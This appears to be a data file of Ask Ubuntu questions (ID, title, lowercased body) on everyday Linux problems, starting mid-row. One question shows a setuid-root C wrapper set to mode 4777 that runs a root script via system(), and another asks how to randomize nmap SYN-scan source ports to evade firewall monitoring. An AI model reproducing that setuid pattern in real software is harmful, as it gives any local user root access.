, i was able to browse or even copy files between machines , even though i did n't enter any password on those useless prompts . b i also tried the whole process again ( after restarting both machines ) , this time with the password and remember this password options set in the connect to server dialog . did n't make any difference . this password prompt is especially annoying because it is system-modal , which means i ca n't do anything else ( not even switch to another window ) if it is visible . any idea what might be causing this ? or should i switch to a different remote mouting gui such as gigolo ?
426532	how can i install ubuntu touch in samsung galaxy y phone ?	i want to install ubuntu touch on samsung galaxy y but it does n't appear in the supported devices list . what are the hardware requirements for ubuntu touch and how can i install it in my samsung galaxy y ?
426534	ubuntu 12.04 lts - making configuration backup	i 'm new in ubuntu but i really like it . i re-install it a lot of times past few days trying to change the system the way i like . is there a way that i could make an iso with the configurations i made ?
426540	3g d-link dwm-157 modem install on ubuntu 12.04	i 'm a new in linux and ubuntu , too . please , tell me how i can install my 3g modem ( d-link dwm-157 ) on ubuntu 12.04 . some steps , that i 've been already tried ( after googling ) : plug in the modem ( green light is fired ) ; run `` sudo su '' command ; lsusb ( command line ) - my usb-device is found ( `` bus 003 device 010 : id 2001 : a707 d-link corp. '' ) ; mounted it ( type the command `` mount /dev/sr '' , then press tab some times - `` sr0 '' and `` sr1 '' are displayed in terminal line ; plug off the usb-device and repeated previous operations : `` sr0 '' only was shown on terminal window ) ; '' /media/cdrom '' has now `` 3g_modem_connect_d310a_amd64.deb '' and '' -//-//-_i386.deb '' files ( my os type is 64-bit , but i tried both versions of files ) ; i 've been trying install it as from ubuntu software center , as use `` dpkg -i `` command with both versions of files - `` install finished . '' was be displayed . after this all , in `` network manager '' my usb-device is not shown ... ( after plug off device and plug in it again red light is fired only ) . please , tell me , what i should to do ( step by step : ) ) , then my usb-device ( 3g modem ) becomes working . ( sorry for bad english ; )
426542	listeners disconnect from icecast streams	i 'm doing a project on live audio streaming using icecast and mixxx . i configured icecast server successfully . i'am able to listen the audio but sometimes connection reset occurs and the connection can be again established by refreshing the page . this becomes a series issue when two or more listeners are present . how can i solve this issue ?
426543	install ffmpeg in ubuntu 12.04 lts	background : i used ffmpeg to merge two videos side by side . first i install ffmpeg by following command as it suggest by ubuntu itself . sudo apt-get install libav-tools or sudo apt-get install ffmpeg but then i realize it is not the correct version since it does n't support for -filter_complex and few other functions . after a few hours researcher i found real ffmpeg and i succeed with video conversion as well . as per that article , it is suggesting we need to build it our own . https : //trac.ffmpeg.org/wiki/ubuntucompilationguide question : what is easiest way to install that ffmpeg version ( which is support for -filter_complex ) without following all those steps ?
426545	different scans result for source ports in nmap	i have a question about nmap scanning . i have noticed that when performing a syn scan with nmap -ss , my source port is always the same , but when performing a full tcp connect scan -st the source port is being randomized . is there any logic behind this behavior and should it be considered to randomize my source port in syn scan , so that the firewall on the other side could n't monitor my scans more easily ? i know that you can choose your source port with -g option , but is there any way to randomize my source ports in a syn scan and is it necessary ? i am a student and performing this scans for educational purposes only . thanks in advance .
426547	where does a ubuntu system store the username and password for a mounted system ?	i have mounted a windows system from a folder . first i pressed ctrl + l. then on top in location by samba protocol i connected to the remote system . i provide the remote system username and password for the first time . also marked to save the password . so , for the next time i only provide the samba url and it connects to the remote system . i found inside my home folder , there is an hidden folder .gvfs got created . inside that folder i found the mounted remote system . even i restart the machine , it does n't ask for the username and password again . ubuntu must store the username and password of the remote system . where does it store these ?
426549	compile and loading kernel module without compiling the kernel	i am trying to get hostapd working and it does not recognize the current wl driver , searching in internet i found that i need to use the new nl80211 driver . i found that my current system does not have such driver module to load since if i run sudo modinfo nl80211 it returns : $ sudo modinfo nl80211 error : modinfo : could not find module nl80211 at the same time i found in my current kernel header a header file of that module : $ sudo find /usr/src/ -name `` nl80211 . * '' -print /usr/src/linux-headers-3.2.0-56/include/linux/nl80211.h so how can i get that module working , should i recompile the whole kernel with that module , or is it there a way to compile that module and load to the current kernel avoiding the kernel compilation ? this is my computer specifications : ubuntu 12.04.3 3.2.0-58-generic x84_64 current driver wl , cfg80211 , lib80211 lspci -k output : 03:00.0 network controller : broadcom corporation bcm43227 802.11b/g/n subsystem : foxconn international , inc. device e040 kernel driver in use : wl kernel modules : wl
426554	no such command 'sip show peers ' when using asterisk	i want to connect two soft phone using asterisk after configuration the sip.conf and iax.conf and extension.conf ca n't enter any order from cli example of the error : connected to asterisk 11.6-cert1 currently running on fedo-virtualbox ( pid = 1066 ) fedo-virtualbox*cli > sip show peers no such command 'sip show peers ' ( type 'core show help sip show ' for other possible commands )
426557	ubuntu does not boot after lamp install	after following the suggestions of my friends i have finally decided to use ubuntu . i downloaded the windows installer and installation was really a breeze . however what followed was a disaster . i used sudo tasksel to install lamp and everything completed successfully but when i tried to reboot ubuntu the system does not boot anymore it goes to a screen which reads somehow like '' using 127.0.0.1 for servername .. the server 's fully qualified domain [ ok ] *starting web server apache 2 '' ( i dont have enough reputation to post the screenshot ) and from there i can not do anything . so what should i do now ?
426561	good movie mp4 metadata editor ?	i need to read metadata from one of my movies in mp4 format and to do that i need a very basic mp4 ( for movies ) metadata editor . which programs can you recommend ? ( since i do n't know any ) . i do n't need media organizors , nor anything fancy , just something that allows me to peek inside the file .
426564	2 graphics cards , 3 monitors , when running compiz keyboard doesnt work on 1 monitor	i 've got ubuntu working with multiple graphics cards finally , both nvidia , onboard 7025 and a pci-e 9800gt the 9800 has multiple outputs with 2 monitors connected and the onboard is activated with another monitor , xinerama is deactivated as i can not get composite to working with it activated . activating both xinerama and composite together clones the same display across three monitors , i 've tried adding the clone off option in the xorg.conf but doesnt do anything . when i activate compiz depending on which screen i use the compiz -- replace on , the other screen 's keyboard stops working , for instance if i activated compiz on the 9800 anything i open on the 7025 i cant type on , keystrokes just are not acknowledged anyone have any suggestions on either how i can get xinerama to work with composite and not clone the display or how you can get the keyboard to work on both graphic cards when compiz is activated
426565	are the juju charms os version ( i.e 12.04 ) specific ?	should i stick with ubuntu precise or i can use newer versions of ubuntu ? are the charms version specific or there are no such constraints ? thanks !
426567	postfix can receive but ca n't send emails	can someone please help , i setup postfix and can receive , but ca n't send email from my server , when i use gmail smtp i can send emails as gmail user but that is not what i want . here is my mail queue : checked if port is open by some website : telnet from my local network on port 25 say : gam.gamblershome.info emtp postfix ( ubuntu ) i am not an expert , if someone can help me i will be more than grateful .
426574	error `` system program problem detected '' on ubuntu 13.10	i got this error this morning , i did update anything before . when i enter my password , the screen became black and the popup display a popup with this message : system program problem detected . i tried this link but i still did fix this problem yet . when i tried to type nautilus the terminal show the warning : ( nautilus:4060 ) : gtk-warning ** : can not open desplay . i continued type unity , then other warning like that : warning : no display variable set , setting into :0 unity-panel-serviece : no process found compiz ( core ) - info : loading plugin : core invalid mit-magic-cookie-1 key compiz ( core ) - fatal : could'nt open display :0 ... . so , can some one solve it ?
426581	where did i fail with my basic iptables setup ?	i installed iptables on a vps ( virtual private server from openvz ) - linux 2.6.32-24-pve # 1 smp fri sep 13 07:29:30 cest 2013 i686 gnu/linux . i also installed : apt-get install iptables-persistent iptables status : iptables -l -v chain input ( policy accept 96 packets , 4864 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 297 packets , 11296 bytes ) pkts bytes target prot opt in out source destination i used these rules to generate the files rules.v4 as well as rules.v6 in /etc/iptables/ . ls -lisah /etc/iptables/ insgesamt 32k 82101653 4,0k drwxr-xr-x 2 root root 4,0k feb 26 13:37 . 81218355 4,0k drwxr-xr-x 116 root root 4,0k feb 26 13:37 .. 82100327 8,0k -rw-r -- r -- 1 root root 7,9k feb 26 13:36 rules.v4 82101662 8,0k -rw-r -- r -- 1 root root 7,9k feb 26 13:36 rules.v6 i rebooted the machine but same output from iptables -l as above . i tried to iptables-restore < /etc/iptables/rules.v4 as well for rules.v6 but i get this : iptables-restore : line 154 failed ( at 'commit ' ) any ideas where i took the wrong turn ?
426582	partition the disk without rebooting	how to extend the partition table without rebooting ? the change should be informed to kernel without rebooting .
426583	set permissions just for a subfolder	i have a folder under the /etc directory . this folder and files contained in it has to be accessed by every user beloning to mygroup group . i correctly set permissions : every file in this directory gives me , after ls -l my file owner mygroup this goes for every subfolder ( i manually set this for each file/folder ) . anyway , if i type cat /etc/myfolder/example.txt it tells me that i do n't have anough permissions . i think this is due to the fact that /etc folder belongs to the root . but i do n't want to change group to the /etc folder too ! and i need that folder to stay there ! how to solve this problem ? edit : output of ls -ld /etc/myfolder/ /etc/myfolder/example.txt gives me drwxr-xr-x 2 root mygroup 4096 feb 26 12:10 /etc/myfolder/ -r -- -- -- -- 1 root mygroup 1204 feb 26 12:10 /etc/myfolder/example.txt
426584	future of intel atom d2600 ( dual core ) with graphics	on our kiosk-machine with the intel atom d2600 ( dual core ) ubuntu 12.04 64-bit works smoothly and has a good video-output . however when i install 12.10 or later then the display will be set back to 640x480 and ubuntu thinks there will be 3 monitors ( 1 laptop , a cr24 '' screen and the real monitor ( hp 17 '' ) . i can not change that behaviour because the screensettings wo n't be saved by some reason . because i can stick on this version for this year so far no problem . but the question will be of course , does ubuntu 14.04 support this processor including the graphics . i do n't use the cedarview drivers ( it 's only on 32-bit ) and i can not switch to 32-bit because the application will work with dates beyond the 2038-01-19 so we need to work with 64-bit integers .
426587	submitted applications for ubuntu desktop	are the submitted desktop applications for ubuntu reviewed and added to the ubuntu software center anymore ? its been a month that i submitted an application named ply visualizer on developer.ubuntu.com and on the developers page it still says 'pending review ' . i had previously submitted some applications and they were reviewed within a week .
426589	ca n't boot ubuntu installer	i have an old elo entuitive touch computer with windows xp and i wanted to install ubuntu with an usb stick , but i could n't boot it with 13.10 at all . so i went with 13.04 and the same error . whenever it boots , it just shows that ubuntu is loading and then it just reboots itself . the elo specs are 512mb of ram and 320gb of disk , so it passes the minimum requirements . i did n't try with other distros , but i do n't think it 's something ubuntu specific . what could it be the cause of this ? should i check something on the bios ? update : to give more information , whenever i boot the usb stick it only gets as far as this screen : http : //i.stack.imgur.com/ghkuk.png update 2 : i just found out the error was because the elo touchscreens are n't supported by the x.org version ubuntu ships . i was able to install ubuntu with alternate but now i ca n't start the graphic server .
426590	how to clean up and fine tune ubuntu	are there any tools to clean and fine tune ubuntu ? my computer has become slow . i am using chrome , chromium and firefox running an intel nuc . specs : 16gb ram 128gb ssd
426591	how to install tor	i have downloaded tor.xz file from some where how can i install it.i do not know what to do with this file.the location of this file is '/home/documents'.please some one help me through the terminal codes . thanks in anticipation
426594	usb wacom signpad ( stu-500 ) in a connect / disconnect loop ( ubuntu 12.04.4 lts - 64-bit )	i want to use a signature signpad from wacom : when plugging in the signpad a connect / disconnect loop starts and the device is not usable . the following is a snippet from the dmesg output : [ 369.704230 ] usb 4-1 : new full-speed usb device number 2 using uhci_hcd [ 369.860281 ] usb 4-1 : new usb device found , idvendor=056a , idproduct=00a1 [ 369.860286 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 369.860290 ] usb 4-1 : product : stu-500 [ 369.860293 ] usb 4-1 : manufacturer : wacom co. , ltd . [ 375.244489 ] usb 4-1 : usb disconnect , device number 2 [ 375.928523 ] usb 4-1 : new full-speed usb device number 3 using uhci_hcd [ 376.084493 ] usb 4-1 : new usb device found , idvendor=056a , idproduct=00a1 [ 376.084498 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 376.084501 ] usb 4-1 : product : stu-500 [ 376.084504 ] usb 4-1 : manufacturer : wacom co. , ltd . [ 380.948693 ] usb 4-1 : usb disconnect , device number 3 [ 381.744732 ] usb 4-1 : new full-speed usb device number 4 using uhci_hcd [ 381.900713 ] usb 4-1 : new usb device found , idvendor=056a , idproduct=00a1 [ 381.900718 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 381.900721 ] usb 4-1 : product : stu-500 [ 381.900724 ] usb 4-1 : manufacturer : wacom co. , ltd . [ 386.652862 ] usb 4-1 : usb disconnect , device number 4 [ 387.560942 ] usb 4-1 : new full-speed usb device number 5 using uhci_hcd [ 387.716919 ] usb 4-1 : new usb device found , idvendor=056a , idproduct=00a1 [ 387.716924 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 387.716928 ] usb 4-1 : product : stu-500 [ 387.716930 ] usb 4-1 : manufacturer : wacom co. , ltd . [ 392.605115 ] usb 4-1 : usb disconnect , device number 5 [ 393.377145 ] usb 4-1 : new full-speed usb device number 6 using uhci_hcd [ 393.533129 ] usb 4-1 : new usb device found , idvendor=056a , idproduct=00a1 [ 393.533135 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 393.533138 ] usb 4-1 : product : stu-500 [ 393.533141 ] usb 4-1 : manufacturer : wacom co. , ltd . [ 398.309319 ] usb 4-1 : usb disconnect , device number 6 [ 399.193284 ] usb 4-1 : new full-speed usb device number 7 using uhci_hcd [ 399.349371 ] usb 4-1 : new usb device found , idvendor=056a , idproduct=00a1 [ 399.349376 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 399.349379 ] usb 4-1 : product : stu-500 [ 399.349382 ] usb 4-1 : manufacturer : wacom co. , ltd . [ 404.261526 ] usb 4-1 : usb disconnect , device number 7 [ 405.009566 ] usb 4-1 : new full-speed usb device number 8 using uhci_hcd the environment is a standalone machine ( no vm ) : linux jme-ubuntu 3.11.0-17-generic # 31~precise1-ubuntu smp tue feb 4 21:25:43 utc 2014 x86_64 x86_64 x86_64 gnu/linux what is confusing to me is that the stu-520 model from wacom works fine :
426596	python pip importerror : no module named encodings	bonjour , i 've just installed pip by doing sudo apt-get install python-pip but i am facing a problem ... when i want to download a module ( pygame for exemple ) it fails by throwing these errors : traceback ( most recent call last ) : file `` /usr/local/bin/pip2 '' , line 9 , in < module > load_entry_point ( 'pip==1.5.4 ' , 'console_scripts ' , 'pip2 ' ) ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 343 , in load_entry_point return get_distribution ( dist ) .load_entry_point ( group , name ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2309 , in load_entry_point return ep.load ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2015 , in load entry = __import__ ( self.module_name , globals ( ) , globals ( ) , [ '__name__ ' ] ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.5.4-py2.7.egg/pip/__init__.py '' , line 11 , in < module > from pip.vcs import git , mercurial , subversion , bazaar # noqa file `` /usr/local/lib/python2.7/dist-packages/pip-1.5.4-py2.7.egg/pip/vcs/mercurial.py '' , line 9 , in < module > from pip.download import path_to_url file `` /usr/local/lib/python2.7/dist-packages/pip-1.5.4-py2.7.egg/pip/download.py '' , line 2 , in < module > import email.utils file `` /usr/lib/python2.7/email/utils.py '' , line 32 , in < module > from email._parseaddr import quote file `` /usr/lib/python2.7/email/_parseaddr.py '' , line 16 , in < module > import time , calendar file `` /usr/lib/python2.7/calendar.py '' , line 10 , in < module > import locale as _locale file `` /usr/lib/python2.7/locale.py '' , line 15 , in < module > import encodings importerror : no module named encodings i do n't unerstand what can i do . thank you !
426597	expanding environment variables in nautilus	i have a `` sandbox '' folder on my 13.10 pc , which i use for anything along the lines of `` testing '' , or if i 'm updating a piece of code and want it to be completely separate from everything else . in order to have some amount of order for this , i have this split into subfolders , in the following structure : /data/work/sandbox/mmyy/ddmmyy ( i.e . today 's folder is /data/work/sandbox/0214/260214 . ) in order to be able to switch to this directory quickly , i set up my .bashrc so as to assign an environment variable , $ todaysand , which changes daily and points to the correct folder , using the date command : todaysand= '' /data/work/sandbox/`date + % m % y/ % d % m % y` '' this works fine in shells , so i 've removed this line from .bashrc and added it to my profile.d in a new script , /etc/profile.d/sandbox.sh . it still sources correctly , and in terminals i can still cd $ todaysand without any issues at all . i would now like to set a bookmark in nautilus that points to this folder and changes dynamically in the same way , so that i do n't have to track down the latest one every time . however , i ca n't get it to even accept $ todaysand as a folder name . if i type it in the top bar ( by typing a / to let me input a path rather than searching ) , it tries to go to a non-existent file literally named / $ todaysand and gives me an error saying that this does n't exist . similarly , if i make a bookmark pointing to $ todaysand , it a ) creates it with the same icon as if i had told it to bookmark a network location , and b ) crashes out of nautilus instantly when i click on it . how can i go about making nautilus accept this variable as a valid filepath ?
426600	internet not working in my dell inspiron-5520	i recently installed ubuntu 12.04 in my dell inspiron-5520 laptop . though everything else seems to work properly the wireless network does n't seem to work which worked perfectly when i had windows 7 installed . i also tried connecting to internet using a wired network and that too does n't work . please help me as i am new at this . i might be wrong but i think there might be a problem with my network drivers . in any case my laptop uses bcm43142 chipset .
426603	messed up titlebars	noticed that yesterday there were some kind of updates , briefly ran through the list and remember keywords like opengl , mesa etc.. updated my computer and this morning did a fresh boot and noticed the messup of every single window 's titlebar ( see attached picture ) . parts of it became transparent , other parts seems to have loaded some distorted information from other parts of the screen or something.. real mess . some minutes ago arrived nvidia update and xorg edgers updates too , installed them rebooted , titlebars still messed up . i am on asus n550jv laptop , nvidia geforce 750m , running ubuntu 13.10 64 bit , latest bumblebee and nvidia 331.49 drivers . any ideas what to do to fix the glitch ? thanks maris
426604	text shadow in gnome-shell.css for currently active window	i am trying to edit the gnome-shell.css file for my current theme on gnome 3.6 ubuntu and can not find the entry for the currently active window as i 'd like to remove the text shadow .
426609	ppa repository : where is the clone installed ?	would somebody be so kind and help me with the repository problem ? i am trying to make a copy of ppa repository and i would like to specify the target installation folder . without it i can run the application , but i dont know , where it is installed and where all the subfolders are . i am using ubuntu v 13 .
426610	hibernate option missing in ubuntu 12.04 , after extending the root partition	till yesterday , the hibernate option was enabled and working perfectly fine . today morning , i have extended the root partition by adding some extra free space to it . i used the gparted tool in the ubuntu live session for doing this . after extending the root partition , i see the hibernate option not getting displayed in the system 's shutdown-menu . ps : i have tried the guide at this link . but , it did n't work .
426613	how to install drivers for samsung printer ml-2955 on ubuntu 13 ?	i tried to install 2 versions of printer drivers . specifically for samsung printer ml-2955 . the other one generic linux driver . i do not know how to install neither of them . there is autorun file which opens window with this content > # ! /bin/sh base=`dirname `` $ 0 '' ` exec sh `` $ base/linux/install.sh '' now i have no idea what to do with that : ( the other version is similar ( no autorun but similar window content ) . thanks for supporting a humble linux beginner : ) radovan
426616	system backup with dd to external hdd	i want to backup my whole system . i am wondering if the dd command is a good choice for that . dd if=/dev/sda of=/dev/sdb for example : /dev/sda is my system partition ( partition is on a ssd if that information is important ) and /dev/sdb is my external usb hdd . is it possible to clone the whole system to a specific directory on my external hdd ? like this : dd if=/dev/sda of=/dev/sdb/directory i thought of the possibility to write my own backup-script , which makes a weekly backup of my system using the 'dd ' command . beyond that i want to encrypt my backup directory . what is a good choice for doing that ? ( i thought of encfs for example ) .
426618	skype does n't start on ubuntu 12.04 x64	i 'm working on ubuntu 12.04 x64 and when i 'm trying to run skype there 's following message in terminal : skype : error while loading shared libraries : libgstbase-0.10.so.0 : can not open shared object file : no such file or directory i 've tried reinstalling and purging but it does n't work . can anyone explain what is wrong and what should i do ?
426629	is it possible to achieve ha using the rabbitmq-server juju charm ?	is it possible to achieve ha using the rabbitmq-server juju charm ? is it possible to have mastar/slaves ? hot standby , like the postgresql charm ? thanks
426630	unable to mount external memory - help !	please help , my computer had a problem with it 's usb ports , they were damaged and sense then did n't want to recognize any mass storage devices . then i got a 4 port usb hub and that did the trick . i can put anything in it , sometimes with difficulty , but it technically works with everything and everywhere , except when i want to use my external memory in ubuntu . it 's a 2 tb seagate hard drive . when i plug it in i get this error : # unable to mount external memory error mounting /dev/sdc1 at /media/ant/external memory1 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdc1 '' `` /media/ant/external memory1 '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . what am i supposed to do to fix this ? i know it 's because of the hardware being damaged , but it works well in windows ... ca n't i do something ?
426631	how do i stop the networkmanager in ubuntu 13.10 without using the service command ?	usually this works as root service network-manager stop but last time it did n't . there was some message like `` no such service '' . strangely today , after a reboot it works ! yesterday i also tried : /etc/init.d/network-manager stop but that doese n't exist . and : killall networkmanager but it seems to restart immediately . wild man found a link that says there may be a bug in 13.10 and if you use sudo in front of all the commands like i have them written in the answer then they will work . even if you are root you still have to use sudo . http : //ubuntuforums.org/showthread.php ? t=2181441 or why could the service command fail ? how do i definitely stop networkmanager , even if the service command does n't work ?
426632	how to enable multi-touch screen on dell vostro 5470 ?	i bought the new dell vostro 5470 with touch screen that supports multitouch ( to 10 fingers ) . i installed ubuntu 13.10 and it worked just touch the screen with one finger . would enable multitouch but i could not , can someone help me ? someone has gone or is going through something ? thank you !
426635	how to let a user execute a script owned by root ? setuid does n't seem to work anymore	i have some bash scripts that i use with the user 'root ' to manage iptable rules . the problem is that i want these things at the same time : the script must be owned by root permissions must be 700 i want to have an executable binary that certain user can execute . this executable will run the mentioned script as root . this used to work , and is still what i use in older distributions : # include < stdio.h > # include < stdlib.h > # include < sys/types.h > # include < unistd.h > int main ( ) { setuid ( 0 ) ; system ( `` /root/iptables/my-iptables-script.sh '' ) ; return 0 ; } so i compile this and then use 'sudo chown root ' and 'sudo chmod 4777 ' . this way the user can now execute the binary and run the script owned by root . but now i installed ubuntu 13.10 and when i run that binary i get `` permission denied '' for the script . has something changed in this respect since 12.04 ? what can i do ?
426639	new installation-beginner - desktop but no terminal /shell / usb drives present or available	have just installed 13.10 [ 64 bit ] on spare windows xp ( 64 bit ) machine ie c drive is partitioned . desktop works fine but how do i access the shell / terminal ? also none my usb drives are present - but my old floppy drive was . [ i am trying to use arduino software and to be able to plug in hardware to usb port - ie get arduino sketches to work and use 'sudo ' commands etc. ] sorry , if this a stupid question but i am a complete novice . solved - got terminal icon by ctrl-alt - t. found arduino ide download in arbuntu software centre [ after failing with the sudo apt-get route ] - so far so good
426641	dual-boot problems , installing ubuntu alongside windows 8.1	hello here is my system , currently running on windows 8.1 created new partition - > installed ubuntu on there ( when installing the ubuntu , i can not see any options that has `` ... install along windows 8 '' . i can only see option to erase the disk which is i dont want ) , and done . after computer restarts , my pc does not detect ubuntu , and it proceed to windows 8.1 . so i use easybcd , and i added the ubuntu there anyone can help me if i missed something ? ? thanks !
426643	/home/user/videos/ directory closes automatically	i have ubuntu 13.04 installed on my laptop . when ever i try open videos directory [ default directory under ~ , not manually created ] via ui it closes immediately . but i can play videos in that directory via terminal . what is the matter with that particular directory [ /home/user/videos/ ] ... ?
426644	how do i launch everpad ?	the problem : unable to launch everpad on 64bit ubuntu 13.10 . i get the below error : $ everpad traceback ( most recent call last ) : file `` /usr/bin/everpad '' , line 9 , in < module > load_entry_point ( 'everpad==2.6.1dev ' , 'gui_scripts ' , 'everpad ' ) ( ) file `` build/bdist.linux-x86_64/egg/pkg_resources.py '' , line 353 , in load_entry_point file `` build/bdist.linux-x86_64/egg/pkg_resources.py '' , line 2321 , in load_entry_point return ep_map file `` build/bdist.linux-x86_64/egg/pkg_resources.py '' , line 2048 , in load if req.specs : raise valueerror file `` /usr/lib/pymodules/python2.7/everpad/pad/indicator.py '' , line 8 , in < module > from everpad.pad.editor import editor file `` /usr/lib/pymodules/python2.7/everpad/pad/editor/__init__.py '' , line 6 , in < module > from everpad.interface.editor import ui_editor file `` /usr/lib/pymodules/python2.7/everpad/interface/editor.py '' , line 125 , in < module > from pyside import qtwebkit importerror : can not import name qtwebkit what i have tried so far : interestingly , i tried testing everpad in a live boot and still had the same issue . the latest repositories just do not like the pyside module . i did have an issue beforehand where it failed because it could n't even see the pyside module in python . however i managed to work around the pyside install and got to the latest error of not being able to import qtwebkit from pyside . i have found the below link which managed to get me to this stage . https : //github.com/nvbn/everpad/issues/401 thought the issue could be to do with the pyside install not having the .egg-info . apparently something to do with the way apt-get installs python-pyside . however it does n't seem to install the pyside.qtwebkit module correctly . also get this problem from pip install pyside . the link above pretty much just suggests installing pyside via pip install pyside but i seem to have problems directly with importing qtwebkit from the pyside module in the python interpreter . other things i have tried : i have tried linking from the qtwebkit that i found in /usr/local/lib/python2.7/dist-packages/pyside to /usr/lib/python2.7/dist-packages/pyside but that just resulted in a 'segmentation failure ' when launching everpad . anyone that understands the pyside module/python/everpad able to shed some light on this one ? is it my pyside module just not installing correctly ?
426646	why wo n't my fglrx drivers work ?	i have the amd a10-5800k apu , and later upgraded and added the amd hd 7770 . whenever i play on games my fps is really low , so i did some digging and the graphics card in use seems to be the a1 -- 5800k . when i install the graphics drivers , either through the software center or the terminal , i have to restart and i get a massive black bar all around my screen . the temporary fix is to change the resolution , but that mucks up the aspect ratio . is there a permanent fix ? i have reinstalled ubuntu , but nothing i try seems to work . sorry to waste time if this is a basic fix . thanks for the help ... assuming i get any : )
426648	how to reinstall pulseaudio ( ubuntu 12.04 )	i was trying to fix my audio problems using suggestions from this forum . one of the comments suggested i execute this and only this : killall pulseaudio so i did , and i restarted my computer just in case , but all it did was remove my soundcard and i still could n't hear anything . now i do n't know how to get my soundcard back . please note that i am extremely inexperienced when it comes to ubuntu .
426649	some function keys stop working	i have some problem with my built in ( also externeal ) keybord . function keys ( volume up/down , mute ) and polish characters ( right alt ) are not working anymore . right alt behave in the same way as left alt ( open hud ) . i also ca n't entry polish characters with onboard ( on screen keyboard ) . what i tried : function keys are correctly configured in system settings- > keyboard- > shortcuts , system see them correctly ( i tried to change this and i am able to do it ) there is polish keyboard layout selected anybody have idea how to fix it ?
426650	clementine not playing certain files	last week i ripped some cds in morituri and rhythmbox . everything seemed fine except for one cd . after a few tracks i got some weird error while ripping ( to flac ) with morituri , so i ripped the rest of that cd with rhythmbox . afterwards clementine could not play the tracks i ripped from the cd ( as wel those ripped with morituri as those ripped with rhythmbox ) . clementine acts as if they are not present in my library . with rhythmbox however , i can perfectly play all the tracks . i do have the same problem with some mp3 files i got from a friend . i can play them in rhythmbox , but clementine acts as if they do not exist . how do i get it to work normally again ? i have already tried to reinstall it , deleting the config files , removing the one installed from the repos and installing the latest version from www.clementine-player.org note : clementine can perfectly play the other cds i ripped as well as the rest of my music library ( mostly in flac , with some files in mp3 ) . i do n't know which extra info i can provide , but feel free to ask . edit : when running clementine in a terminal and then trying to play one of the `` problematic '' tracks i get the following message : 11:36:48.542 info moodbarloader:144 creating moodbar data for `` /home/user138784/music/stromae/racine carrée/01.ta fête.flac '' 11:36:48.546 error moodbarpipeline:134 error processing qurl ( `` file : ///home/user138784/music/stromae/racine carrée/01.ta fête.flac '' ) : `` resource not found . '' 11:36:48.546 error moodbarpipeline:134 error processing qurl ( `` file : ///home/user138784/music/stromae/racine carrée/01.ta fête.flac '' ) : `` resource not found . '' 11:36:48.571 error gstenginepipeline:563 2 `` gstfilesrc.c ( 1042 ) : gst_file_src_start ( ) : /gstpipeline : pipeline/gsturidecodebin : uridecodebin-15/gstfilesrc : source : no such file `` /home/user138784/music/stromae/racine carrã©e/01.ta fãªte.flac '' '' 11:36:48.572 error gstenginepipeline:563 2 `` gstfilesrc.c ( 1042 ) : gst_file_src_start ( ) : /gstpipeline : pipeline/gsturidecodebin : uridecodebin-15/gstfilesrc : source : no such file `` /home/user138784/music/stromae/racine carrã©e/01.ta fãªte.flac '' '' 11:36:48.681 warn gstengine:572 gstreamer error : `` resource not found . '' 11:36:48.684 warn unknown qtimeline : :start : already running i think the problem might be related to some characters used in the path to the file . for example , the album `` racine carrée '' can not be played , as well as songs from `` goran bregović '' . as i 'm using beets to organise my music this path is created automatically . maybe i can edit my beets config file to exclude special characters . i 'm using ubuntu 13.10 edit : the locale command returns the following output : lang=en_us language=en_gb lc_ctype= '' en_us '' lc_numeric= '' en_us '' lc_time= '' en_us '' lc_collate= '' en_us '' lc_monetary= '' en_us '' lc_messages= '' en_us '' lc_paper= '' en_us '' lc_name= '' en_us '' lc_address= '' en_us '' lc_telephone= '' en_us '' lc_measurement= '' en_us '' lc_identification= '' en_us '' lc_all=
426651	installed ubuntu 13.10 but not booting	my computer intel i5-4440 intel db85fl motherboard ddr3 ram 4gb wd hdd 500gb installed ubuntu 13.10 from dvd on a previously installed version of 12.04.1 . installation was successful , and asked for reboot which did not took place . even after that , the computer is working fine on all aspects , including internet , on try ubuntu mode ( live dvd ) . other problems . 1.the display of the monitor has got vertically squeezed . 2.the restart and shutdown functions got seemingly interchanged . on the former one , the computer hangs , and the later one computer shuts down and after few seconds it starts automatically again .
426652	freenx gnome-classic session shows no file icons and top bar is black	i have a remote server running 12.04 and connect to it with freenx ( running on the server ) and the nomachine client . everything seems to working apart from one thing : most icons are missing . the left part of the top bar is black , the application and files tab are black , but show up when i click on it , all bars are a simple grey and generally there seems to be a graphical glitch of some sorts ... the only thing i have tried to play with is the /etc/nxserver/node.conf where i have this line command_start_gnome= '' /usr/bin/gnome-session -- session=gnome-classic '' ( gnome-fallback does the same and so does removing the /usr/bin/ bit ) any ideas ? ps : unity-2d does n't work either , it returns an error saying unity-2d session not found .
